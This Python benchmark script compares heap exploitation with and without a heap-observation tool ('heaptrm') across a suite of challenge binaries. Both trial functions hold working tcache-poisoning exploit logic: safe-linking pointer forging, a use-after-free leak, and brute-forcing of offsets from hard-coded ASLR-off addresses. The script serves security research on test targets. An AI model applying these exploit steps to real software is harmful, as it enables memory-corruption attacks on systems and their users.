| |
| """ |
| same_session_benchmark.py — The correct benchmark. |
| |
| Both approaches run in the SAME process session: |
| A: heaptrm session — observe addresses, compute exploit, execute in same session |
| B: blind session — same binary, same protocol, but no heap observation |
| |
| This tests: does structured heap observation enable exploitation that's |
| otherwise impossible? No LLM needed — the exploit logic is deterministic |
| given the addresses. The question is purely: can we GET the addresses? |
| """ |
|
|
| import subprocess |
| import json |
| import struct |
| import os |
| from pathlib import Path |
| from collections import defaultdict |
|
|
# Directory two levels above this script; every other path is derived from it.
ROOT = Path(__file__).parent.parent

# Directory holding the challenge binaries and their manifest.json.
SUITE = ROOT.joinpath("cve_tests", "suite")

# Release build of the heaptrm CLI, kept as a plain string for subprocess argv.
HEAPTRM = str(ROOT.joinpath("heaptrm-cli", "target", "release", "heaptrm"))

# Number of attempts per challenge for each of the two approaches.
TRIALS = 10
|
|
|
|
def heaptrm_session(binary: str, sc: int) -> bool:
    """Run one observe-then-exploit trial against ``binary`` under heaptrm.

    The target is started through the heaptrm CLI, which is driven with one
    JSON request per line on stdin and answers with one JSON line on stdout.
    The heap is prepared, a single ``observe`` request yields the chunk
    addresses, a poisoned forward pointer is computed from them, and the
    exploit is played back in the very same process.

    Args:
        binary: Path of the challenge binary to run under heaptrm.
        sc: Value passed as the third field of every ``1 <idx> <sc>`` request
            (presumably a size class -- confirm against the challenge source).

    Returns:
        True if the reply to the final ``3 2`` request contains the marker
        hex ``50574e4544`` ("PWNED") in its ``output`` field; False on any
        failure, including a missing heap snapshot or a protocol error.

    Raises:
        OSError: If the heaptrm executable itself cannot be started. This is
            left to propagate so a missing build is not reported as 0%.
    """
    proc = subprocess.Popen(
        [HEAPTRM, binary],
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        stderr=subprocess.DEVNULL,
        text=True,
    )

    def cmd(action, data=""):
        """Send one JSON request line and return the decoded reply ({} on EOF)."""
        proc.stdin.write(json.dumps({"action": action, "data": data}) + "\n")
        proc.stdin.flush()
        line = proc.stdout.readline()
        return json.loads(line) if line.strip() else {}

    try:
        # Heap setup: three "1 <idx> <sc>" requests followed by "4 0" and
        # "4 1" (presumably allocate x3, then free slots 0 and 1).
        for idx in range(3):
            cmd("send", f"1 {idx} {sc}\n")
        cmd("send", "4 0\n")
        cmd("send", "4 1\n")

        # The single observation this approach is allowed to rely on.
        r = cmd("observe")
        if not r.get("heap"):
            cmd("quit")
            return False

        def by_address(chunk):
            return int(chunk["address"], 16)

        chunks = r["heap"]["chunks"]
        freed = sorted((c for c in chunks if c["state"] == "freed"), key=by_address)
        allocated = sorted(
            (c for c in chunks if c["state"] == "allocated"), key=by_address
        )

        if len(freed) < 2 or not allocated:
            cmd("quit")
            return False

        # Highest-address freed chunk is the one overwritten through slot 1;
        # highest-address allocated chunk is the one we want to alias.
        chunk1_addr = by_address(freed[-1])
        target_addr = by_address(allocated[-1])
        # Same shape as glibc safe-linking: stored fd = ptr ^ (location >> 12).
        poisoned = target_addr ^ (chunk1_addr >> 12)
        # 8 little-endian bytes -> exactly 16 hex characters.
        fd_hex = struct.pack("<Q", poisoned).hex()

        cmd("send", f"2 1 {fd_hex}\n")
        cmd("send", f"1 3 {sc}\n")
        cmd("send", f"1 4 {sc}\n")
        # Payload is hex for "PWNED!!\n".
        cmd("send", "2 4 50574e454421210a\n")
        r = cmd("send", "3 2\n")
        cmd("quit")

        return "50574e4544" in r.get("output", "")
    except Exception:
        # Trial boundary: a dead tool, malformed JSON or an unexpected reply
        # schema all count as a failed trial rather than aborting the run.
        return False
    finally:
        # Kill before closing the pipes so closing can never block, and do
        # not swallow KeyboardInterrupt/SystemExit while cleaning up.
        try:
            proc.kill()
            proc.wait(timeout=2)
        except (OSError, subprocess.TimeoutExpired):
            pass
        for stream in (proc.stdin, proc.stdout):
            try:
                stream.close()
            except OSError:
                pass
|
|
|
|
def blind_session(binary: str, sc: int, config: dict) -> bool:
    """Run one exploit trial against ``binary`` without any heap observation.

    The same request sequence as the heaptrm approach is sent, but the
    addresses needed for the poisoned pointer must come from the target's own
    replies. Strategies are tried in this order:

    1. Addresses printed in the replies to the ``1 1`` and ``1 2`` requests.
    2. A value read back with ``3 1`` after slot 1 was released, decoded with
       a fixed key (only when no address for slot 1 was printed).
    3. Only slot 0's address printed: the other two are guessed at +0x50 and
       +0xa0 from it.
    4. Nothing usable: a fixed list of offsets from a hard-coded base is
       tried one after another in the same process.

    Args:
        binary: Path of the challenge binary to run.
        sc: Value passed as the third field of every ``1 <idx> <sc>`` request.
        config: Manifest entry of the challenge. Currently unused; kept so
            the signature stays stable for callers.

    Returns:
        True if a reply to ``3 2`` contains the marker ``50574e4544``
        ("PWNED"); False otherwise, including on any runtime error.

    Raises:
        ImportError: If pwntools is not installed.
    """
    from pwn import process as pwn_process, p64, context
    context.log_level = "error"

    marker = b"50574e4544"
    p = pwn_process(binary)

    def do(line):
        """Send one request line and return the stripped reply line."""
        p.sendline(line.encode())
        return p.recvline(timeout=1).strip()

    def parse_addr(reply):
        """Return the first hex number following '0x' in ``reply``, or None."""
        if not reply or b"0x" not in reply:
            return None
        try:
            return int(reply.split(b"0x")[1].split()[0], 16)
        except (ValueError, IndexError):
            return None

    def attempt(poison):
        """Play the exploit sequence with ``poison`` and report marker presence."""
        do(f"2 1 {p64(poison).hex()}")
        do(f"1 3 {sc}")
        do(f"1 4 {sc}")
        # Payload is hex for "PWNED!!\n".
        do("2 4 50574e454421210a")
        return marker in do("3 2")

    try:
        # Same heap setup as the heaptrm approach; keep the replies because
        # some challenges print an address in them.
        replies = [do(f"1 {idx} {sc}") for idx in range(3)]
        do("4 0")
        do("4 1")

        addr0, addr1, addr2 = (parse_addr(reply) for reply in replies)

        # Try to read slot 1 back after it was released.
        leaked_fd = None
        leak = do("3 1")
        if len(leak) >= 16 and leak not in (b"DELETED", b"ERR"):
            try:
                leaked_fd = int(leak[:16], 16)
            except ValueError:
                pass

        poisoned = None
        if addr1 and addr2:
            poisoned = addr2 ^ (addr1 >> 12)
        elif leaked_fd and not addr1:
            # Fixed key equals 0x555555559000 >> 12 (presumably the heap page
            # when ASLR is off -- confirm for the target environment).
            key = 0x555555559
            decrypted = leaked_fd ^ key
            if 0x555555550000 < decrypted < 0x555555570000:
                poisoned = (decrypted + 0xa0) ^ key
        elif addr0 and not addr1 and not addr2:
            # Guess the two later chunks at a fixed 0x50 stride after slot 0.
            poisoned = (addr0 + 0xa0) ^ ((addr0 + 0x50) >> 12)

        if poisoned is not None:
            return attempt(poisoned)

        # No address information at all: walk a fixed list of candidate
        # offsets from a hard-coded base, stopping at the first success.
        base = 0x555555559000
        for off in (0x2a0, 0x300, 0x350, 0x400, 0x450, 0x500, 0x550,
                    0x600, 0x650, 0x700):
            c1 = base + off + 0x50
            tgt = c1 + 0x50
            if attempt(tgt ^ (c1 >> 12)):
                return True
        return False
    except Exception:
        # Trial boundary: a crashed target, EOF or an unparsable reply count
        # as a failed trial. KeyboardInterrupt is deliberately not caught so
        # the benchmark can still be interrupted.
        return False
    finally:
        # Best-effort teardown; a failing close must not change the result.
        try:
            p.close()
        except Exception:
            pass
|
|
|
|
def main():
    """Run both approaches on every challenge and report success rates.

    Reads ``manifest.json`` from SUITE, runs TRIALS attempts of
    ``heaptrm_session`` and ``blind_session`` for every listed challenge
    whose binary exists, prints one row per challenge plus a summary per
    difficulty, and writes the per-challenge results to
    ``bench/same_session_results.json`` relative to the current working
    directory.

    If no trial was run at all (no binary found), a message is printed and
    the function returns without touching the results file.
    """
    manifest = json.loads((SUITE / "manifest.json").read_text(encoding="utf-8"))

    print("=" * 80)
    print("SAME-SESSION BENCHMARK: heaptrm vs blind (same process)")
    print(f"{len(manifest)} challenges × {TRIALS} trials")
    print("=" * 80)

    # Per-difficulty success counters: heaptrm hits, blind hits, trials run.
    by_diff = defaultdict(lambda: {"ht": 0, "bl": 0, "n": 0})
    all_results = []

    for config in manifest:
        name = config["name"]
        binary = str(SUITE / name)
        if not Path(binary).exists():
            continue

        sc = 1
        ht = bl = 0
        for _ in range(TRIALS):
            if heaptrm_session(binary, sc):
                ht += 1
            if blind_session(binary, sc, config):
                bl += 1

        diff = config["difficulty"]
        by_diff[diff]["ht"] += ht
        by_diff[diff]["bl"] += bl
        by_diff[diff]["n"] += TRIALS

        delta = ht - bl
        marker = ">>>" if delta > TRIALS//2 else ">" if delta > 0 else "==" if delta == 0 else "<"
        info = f"leak={config['addr_leak']:7s} uaf={str(config['uaf_read']):5s} noise={config['noise_min']}-{config['noise_max']}"
        print(f" {name} [{diff:8s}] ht={ht:2d}/{TRIALS} bl={bl:2d}/{TRIALS} {marker:3s} | {info}")

        all_results.append({
            "name": name, "difficulty": diff,
            "heaptrm": ht, "blind": bl, "trials": TRIALS,
            **{k: config[k] for k in ["uaf_read", "addr_leak", "noise_min", "noise_max"]}
        })

    total_ht = sum(d["ht"] for d in by_diff.values())
    total_bl = sum(d["bl"] for d in by_diff.values())
    total_n = sum(d["n"] for d in by_diff.values())

    if total_n == 0:
        # Without this guard the OVERALL row divides by zero.
        print(f"No challenge binaries found under {SUITE}; nothing to report.")
        return

    print("\n" + "=" * 80)
    print(f"{'Difficulty':10s} {'heaptrm':>10s} {'blind':>10s} {'delta':>8s}")
    # Known difficulties keep their fixed order; any other label present in
    # the manifest is listed afterwards so it is not silently left out.
    known = ["easy", "medium", "hard", "extreme"]
    extra = sorted(label for label in by_diff if label not in known)
    for diff in known + extra:
        d = by_diff.get(diff)
        if not d or d["n"] == 0:
            continue
        ht_pct = d["ht"] / d["n"] * 100
        bl_pct = d["bl"] / d["n"] * 100
        print(f"{diff:10s} {ht_pct:9.0f}% {bl_pct:9.0f}% {ht_pct-bl_pct:+7.0f}%")

    print(f"{'OVERALL':10s} {total_ht/total_n*100:9.0f}% {total_bl/total_n*100:9.0f}% {(total_ht-total_bl)/total_n*100:+7.0f}%")

    Path("bench").mkdir(exist_ok=True)
    with open("bench/same_session_results.json", "w", encoding="utf-8") as f:
        json.dump(all_results, f, indent=2)


if __name__ == "__main__":
    main()
|
|